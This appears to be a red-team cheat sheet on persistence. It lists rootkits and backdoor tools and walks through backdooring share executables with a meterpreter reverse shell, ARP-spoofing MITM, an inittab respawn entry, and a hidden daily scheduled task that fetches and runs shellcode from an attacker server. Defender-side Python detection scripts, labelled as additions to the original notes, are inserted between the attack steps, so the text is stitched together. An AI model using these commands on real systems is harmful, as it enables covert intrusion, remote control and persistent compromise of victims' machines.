Persistence

Guides and Reference
Tools
  • Egress Buster - EgressBuster is a way to test the effectiveness of egress filtering for an individual area.

  • Egress-Assess - Egress-Assess is a tool used to test egress data detection capabilities

  • Sharpersist - Windows persistence toolkit written in C#.

  • chromebackdoor - Chromebackdoor is a PoC pentest tool that uses a man-in-the-browser (MITB) technique to generate a Windows executable (.exe) which, once launched, runs a malicious extension or script in the most popular browsers and sends all DOM data to the command and control server.

  • cymothoa - Cymothoa is a stealth backdooring tool that injects a backdoor's shellcode into an existing process. The tool uses the ptrace library (available on nearly all *nix systems) to manipulate processes and infect them.

  • casper-fs - Casper-fs is a custom Linux Kernel Module generator that protects or hides a custom list of files. Each LKM protects or hides files according to a custom list in a YAML rule file; not even root has permission to see the files or to edit or remove them. The files can only be read, edited, or deleted if the user sends the proper key to the custom device to unlock that action in the file system.

  • OSRipper - AV evading OSX Backdoor and Crypter Framework

  • TripleCross - A Linux eBPF rootkit with a backdoor, C2, library injection, execution hijacking, persistence and stealth capabilities.

  • Nidhogg - Nidhogg is an all-in-one simple to use rootkit for red teams.

  • SharpEventPersist - Persistence by writing/reading shellcode from the Event Log

  • SharpStay - .NET project for installing Persistence

BackDoorFactory

The goal of BDF is to patch executable binaries with user-desired shellcode and then continue normal execution of the pre-patched state.

  • We can find the most commonly used binaries by searching open shares

    • We start with a command shell on the victim

    • Next we find all the shares on the network the user has access to.

      • Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1'); Invoke-ShareFinder -ExcludeIPC -ExcludePrint -CheckShareAccess | Out-File -Encoding ascii found_shares.txt"

    • Next we take the output from the share search and start enumerating all the executables, recording the LastAccessTime and LastWriteTime of each

      • Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerTools/master/PowerView/powerview.ps1'); Invoke-FileFinder -ShareList .\found_shares.txt -FreshEXEs -ExcludeHidden -CheckWriteAccess"

    • Now we grab a copy of the popular binary you chose. For the following example we will choose procmon.exe

      • #cd /opt/the-backdoor-factory

      • ./backdoor.py -f ~/Desktop/Procmon.exe -s meterpreter_reverse_https -H [your kali IP] -P 8080

    • Once you execute backdoor.py, you need to find a code cave to hold your shellcode.

    • Once you find a cave that works, press "a" to append your code. After this is complete, BDF will drop the new exe in the backdoored folder.

    • Now take that file and put it back on the fileshare.

  • Setup - MITM

    • Run BDFProxy

      • #bdfproxy

    • BDFProxy will create a metasploit resource file.

      • #msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resource.rc

    • We also need to configure our firewall to forward all HTTP traffic through the mitmproxy

      • #sysctl -w net.ipv4.ip_forward=1

      • #iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080

    • Lastly, configure the victim host to route through our machine using ARP spoofing

      • #arpspoof -i eth0 [ip-victim] [ip-gateway]

      • #arpspoof -i eth0 [ip-gateway] [ip-victim]
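
Because BDF writes the patched binary back to the share at its original size (the shellcode lands in a code cave), a defender's integrity check on share executables must compare content hashes, not file sizes. The following is an added example, not part of the original notes or of BDF itself; it assumes the share is reachable as a local path such as a mounted SMB share:

```python
import hashlib
import tempfile
from pathlib import Path

# Assumption: the share is reachable as a local path (e.g. a mounted SMB share).
EXE_SUFFIXES = {".exe", ".dll"}

def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def baseline(root: Path) -> dict:
    """Map share-relative path -> (size, sha256) for every executable under root."""
    result = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in EXE_SUFFIXES:
            result[p.relative_to(root).as_posix()] = (p.stat().st_size, sha256_file(p))
    return result

def compare(before: dict, after: dict) -> list:
    """Return (finding, path) pairs; a hash change at unchanged size is the code-cave case."""
    findings = []
    for rel, (size, digest) in after.items():
        if rel not in before:
            findings.append(("new", rel))
        elif before[rel][1] != digest:
            kind = "modified-same-size" if before[rel][0] == size else "modified"
            findings.append((kind, rel))
    findings.extend(("removed", rel) for rel in before if rel not in after)
    return sorted(findings)

def demo() -> list:
    """Constructed scenario: a share with one tool whose padding bytes are overwritten in place."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "tools").mkdir()
        exe = root / "tools" / "Procmon.exe"
        exe.write_bytes(b"MZ" + b"\x90" * 200 + b"\x00" * 200)  # stand-in for a real PE
        (root / "tools" / "readme.txt").write_text("not an executable")  # ignored by baseline
        before = baseline(root)
        data = bytearray(exe.read_bytes())
        data[210:220] = b"\xcc" * 10  # same length, so a size check alone would not notice
        exe.write_bytes(bytes(data))
        return compare(before, baseline(root))

if __name__ == "__main__":
    print(demo())  # [('modified-same-size', 'tools/Procmon.exe')]
```

Run baseline() against the share on a schedule, store the result, and diff each new run against the stored copy; every "modified-same-size" hit deserves a manual look.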

Linux Techniques

  • Create a functional Bash init script at /etc/init.d/service

  • Next run #sudo update-rc.d service enable

  • This will create a symlink in the runlevel directories 2-5

  • Next add the following respawn command in /etc/inittab

    → id:2345:respawn:/bin/sh /path/to/application/startup

  • Finally start and stop the service

    → #sudo service service stop

    → #sudo service service start

  • PTFM: Service Persistence - pg. 88
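
As a defender-side counterpart to the inittab step above, this added example (not from the original notes or from PTFM) parses inittab respawn entries and flags any whose real target, including a script or an inline shell -c command, lives outside an assumed set of trusted directories:

```python
import shlex
# Assumption: directories where inittab-era service targets normally live.
TRUSTED_DIRS = ("/sbin/", "/usr/sbin/", "/bin/", "/usr/bin/", "/etc/init.d/")
SHELLS = {"/bin/sh", "/bin/bash", "/usr/bin/sh", "/usr/bin/bash"}

def target_program(process: str) -> str:
    """Resolve what really runs: the script or -c command when a shell is the interpreter."""
    try:
        argv = shlex.split(process)
    except ValueError:  # unbalanced quotes: nothing trustworthy to report
        return ""
    if not argv or argv[0] not in SHELLS:
        return argv[0] if argv else ""
    for i, arg in enumerate(argv[1:], start=1):
        if arg == "-c" and i + 1 < len(argv):
            inner = shlex.split(argv[i + 1])
            return inner[0] if inner else ""
        if not arg.startswith("-"):
            return arg
    return ""  # a bare shell with no script: treat as untrusted

def suspicious_respawns(inittab: str) -> list:
    """Return (id, runlevels, program) for respawn entries that run from untrusted paths."""
    hits = []
    for raw in inittab.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":", 3)  # id:runlevels:action:process (process may contain ':')
        if len(fields) != 4:
            continue
        ident, runlevels, action, process = fields
        if action != "respawn":
            continue
        program = target_program(process)
        if not program.startswith(TRUSTED_DIRS):
            hits.append((ident, runlevels, program))
    return hits

# Constructed sample: a stock initdefault and getty line plus the entry from the procedure above.
SAMPLE_INITTAB = """\
id:2:initdefault:
1:2345:respawn:/sbin/getty 38400 tty1
id:2345:respawn:/bin/sh /path/to/application/startup
"""

if __name__ == "__main__":
    for hit in suspicious_respawns(SAMPLE_INITTAB):
        print("respawn entry outside trusted paths:", hit)
```

On a live host, feed it the contents of /etc/inittab and pair the result with a review of the S* symlinks in /etc/rc2.d through /etc/rc5.d that the update-rc.d step creates.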

Windows Techniques

  • RTFM: Task Scheduler Persistence - pg. 32

  • PTFM: Task Scheduler - pg. 25

  • We can use Metasploit to configure a scheduled task that runs once a day and connects back to our meterpreter handler

  • First we grab and modify a copy of invoke-shellcode.

    • #cd /opt/PowerSploit/CodeExecution

    • #cp Invoke-Shellcode.ps1 1.ps1

  • Next we edit the script to add our shell info

    • Add the following line, filling in the listener IP and port

    • # invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost [LISTENER IP] -Lport [Listener-port] -Force;

  • Now we have a shortened invoke-shellcode script and can move the file off to a web server

    • #cp 1.ps1 /var/www/

    • #service apache2 start

  • Verify by visiting http://[your ip]/1.ps1

  • Now we add a command to schtasks that downloads and runs the target script every day

    • #schtasks /create /tn [Fake service name] /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -NoLogo -WindowStyle hidden -Noninteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://[Your IP]/1.ps1''))'" /SC DAILY /ST 12:00:00

  • Options

    • If you have system privileges you can run this under SYSTEM. Add "/ru System" to the above command

    • If you are attacking a 32 bit system, change the powershell location in schtasks to "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe"
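
To spot a task built like the schtasks command above, a defender can triage the output of `schtasks /query /fo CSV /v` for the download-cradle indicators that command line contains. This added example is not part of the original notes; the indicator patterns and the column subset in the constructed CSV are assumptions:

```python
import csv
import io
import re

# Assumption: indicator substrings a triage script looks for in a task's command line
# (all drawn from the schtasks command in the procedure above); matched case-insensitively.
INDICATORS = {
    "exec-policy-bypass": r"-e(p|xecutionpolicy)\s+bypass",
    "no-profile": r"-nop\b",
    "hidden-window": r"-windowstyle\s+hidden",
    "iex-cradle": r"\biex\b",
    "downloadstring": r"downloadstring\s*\(",
    "remote-url": r"https?://",
    "wow64-powershell": r"syswow64\\windowspowershell",
}

def flag_task(command: str) -> list:
    """Names of the indicators present in one 'Task To Run' value."""
    return [name for name, pat in INDICATORS.items()
            if re.search(pat, command, re.IGNORECASE)]

def triage_schtasks_csv(text: str, min_hits: int = 2) -> list:
    """Parse 'schtasks /query /fo CSV /v' output and return (task, run-as, hits) for
    tasks whose command matches at least min_hits indicators."""
    findings = []
    for row in csv.DictReader(io.StringIO(text)):
        hits = flag_task(row.get("Task To Run") or "")
        if len(hits) >= min_hits:
            findings.append((row["TaskName"], row.get("Run As User", ""), hits))
    return findings

# Constructed sample with a subset of the real /v columns: one stock task and one task
# built exactly like the command above (192.0.2.10 is a TEST-NET placeholder address).
SAMPLE_CSV = r'''"HostName","TaskName","Task To Run","Run As User","Schedule Type"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -k -g","SYSTEM","Weekly"
"WS01","\Windows Update Helper","c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -NoLogo -WindowStyle hidden -Noninteractive -ep bypass -nop -c ""IEX ((new-object net.webclient).downloadstring('http://192.0.2.10/1.ps1'))""","SYSTEM","Daily"
'''

if __name__ == "__main__":
    for task, user, hits in triage_schtasks_csv(SAMPLE_CSV):
        print(f"{task} (runs as {user}): {', '.join(hits)}")
```

A task that runs as SYSTEM with several of these hits is exactly the "/ru System" variant described above, so sort findings by run-as user first when triaging a fleet.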

AD Persistence
